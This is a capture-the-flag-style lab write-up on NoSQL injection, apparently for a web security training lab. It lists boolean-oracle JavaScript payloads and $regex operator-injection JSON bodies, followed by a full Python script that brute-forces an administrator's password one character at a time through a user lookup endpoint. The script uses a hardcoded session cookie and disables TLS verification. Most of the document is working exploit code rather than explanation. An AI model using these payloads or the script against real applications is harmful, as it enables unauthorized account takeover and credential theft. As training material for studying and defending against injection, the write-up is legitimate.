3 - Exploiting NoSQL injection to extract data
Boolean-oracle payloads — the response differs depending on whether the injected condition evaluated true. The first one is URL-encoded (`administrator' && 1 && 'x`) and is only a sanity check: if the injection lands, it must behave exactly like the untouched lookup.
administrator'+%26%26+1+%26%26+'x
' && this.password[0] == 'a' || 'a'=='b
' && this.password.match(/\d/) || 'a'=='b   // true if the password contains a digit (the `//` part is a note, not payload)
' && this.password.match(/[a-z]/) || 'a'=='b   // true if the password contains a lowercase letter
Same checks via operator injection in a JSON body — password contains a digit:
{
"username": "carlos",
"password": {
"$regex": ".*\\d.*"
}
}
Password contains a lowercase letter:
{
"username": "carlos",
"password": {
"$regex": ".*[a-z].*"
}
}
Then recover the password one position at a time with the same oracle, e.g. (the script below automates this against the `administrator` account):
GET /user/lookup?user=wiener' && this.password[0] == 'a' || 'a'=='b
#!/usr/bin/env python3
import os
import pdb
import signal
import string
import sys
import time
from urllib.parse import quote

import requests
import urllib3
from pwn import *
def sig_handler(sig, frame):
    """Handle SIGINT (Ctrl-C): print a farewell line and exit with status 1.

    Args:
        sig: signal number delivered by the runtime (unused).
        frame: interrupted stack frame (unused).
    """
    # User-facing message, kept verbatim.
    farewell = "\n\n[!] Saliendo...\n"
    print(farewell)
    sys.exit(1)
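# Ctrl-C aborts the brute force cleanly instead of dumping a traceback.
signal.signal(signal.SIGINT, sig_handler)
# Every request below is sent with verify=False; silence the
# InsecureRequestWarning that urllib3 would otherwise print per request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Variables Globales
# Session token of the already-logged-in (low-privilege) user. Never commit a
# live token: set LAB_SESSION in the environment to override the default.
SESSION_TOKEN = os.environ.get("LAB_SESSION", "Ja7NDzdq3qDkdLa1fmYN9SwjSFHVLJoS")
cookie = {"Cookie": f"session={SESSION_TOKEN}"}
# Candidate alphabet tried at every password position. It must not contain a
# quote or backslash, which would break out of the injected JS string literal.
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'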
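_DEFAULT_BASE_URL = "https://0add009203f6b951805d30b700b8009d.web-security-academy.net"
_DEFAULT_USERNAME = "administrator"
_REQUEST_TIMEOUT = 10  # seconds; an unbounded GET would hang the whole extraction


def _build_payload(username, position, character):
    """Return the `user` query value that probes one password character.

    Decoded by the server it reads
        <username>' && this.password[<position>] == '<character>' || 'a'=='b
    so the lookup succeeds only when the character at `position` matches.
    `&&` and `==` are pre-encoded (%26%26 / %3d%3d) and spaces sent as `+`
    so they are not parsed as query-string separators.
    """
    return (
        f"{username}'+%26%26+this.password[{position}]+%3d%3d+'{character}'"
        f"+||+'a'%3d%3d'b"
    )


def _http_probe(session, headers, url):
    """Send one lookup and return True when the injected condition held.

    The oracle is the substring "role" in the body: a successful lookup
    presumably echoes the user record (which carries a role field), while a
    false condition does not. TLS verification is disabled on purpose for
    the lab host; keep it enabled against anything else.
    """
    response = session.get(url, verify=False, headers=headers, timeout=_REQUEST_TIMEOUT)
    return "role" in response.text


def _pwn_progress():
    """Create the two pwntools progress bars and return a status callback."""
    attempt_bar = log.progress("Fuerza Bruta")
    attempt_bar.status("Iniciando proceso de fuerza bruta")
    password_bar = log.progress("Password")

    def report(payload, password):
        attempt_bar.status(payload)
        password_bar.status(password)

    return report


def _extract_password(probe, build_url, alphabet, max_len, on_progress):
    """Recover the password one position at a time through `probe`.

    Stops at the first position where no alphabet character matches: that is
    either the end of the password or a character outside `alphabet`.
    """
    password = ""
    for position in range(max_len):
        for character in alphabet:
            url, payload = build_url(position, character)
            on_progress(payload, password)
            if probe(url):
                password += character
                break
        else:
            # Full sweep without a hit: nothing more to extract here.
            break
    return password


def makeSQLI(base_url=_DEFAULT_BASE_URL, username=_DEFAULT_USERNAME, *,
             headers=None, alphabet=None, max_len=50, probe=None, on_progress=None):
    """Brute-force `username`'s password through the boolean NoSQL oracle.

    Args:
        base_url: scheme and host of the target, without trailing slash.
        username: account whose password is extracted.
        headers: request headers; defaults to the module-level `cookie`.
        alphabet: characters tried per position; defaults to `characters`.
        max_len: upper bound on the number of positions probed.
        probe: callable(url) -> bool replacing the HTTP request (for tests).
        on_progress: callable(payload, password_so_far) for status output;
            defaults to pwntools progress bars.

    Returns:
        The recovered password; truncated if it is longer than `max_len` or
        contains a character outside `alphabet`.
    """
    if headers is None:
        headers = cookie
    if alphabet is None:
        alphabet = characters
    if probe is None:
        session = requests.session()
        session.verify = False

        def probe(url):
            return _http_probe(session, headers, url)
    if on_progress is None:
        on_progress = _pwn_progress()

    def build_url(position, character):
        payload = _build_payload(username, position, character)
        return f"{base_url}/user/lookup?user={payload}", payload

    return _extract_password(probe, build_url, alphabet, max_len, on_progress)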
if __name__ == "__main__":
    # Only run the extraction when executed as a script, never on import.
    makeSQLI()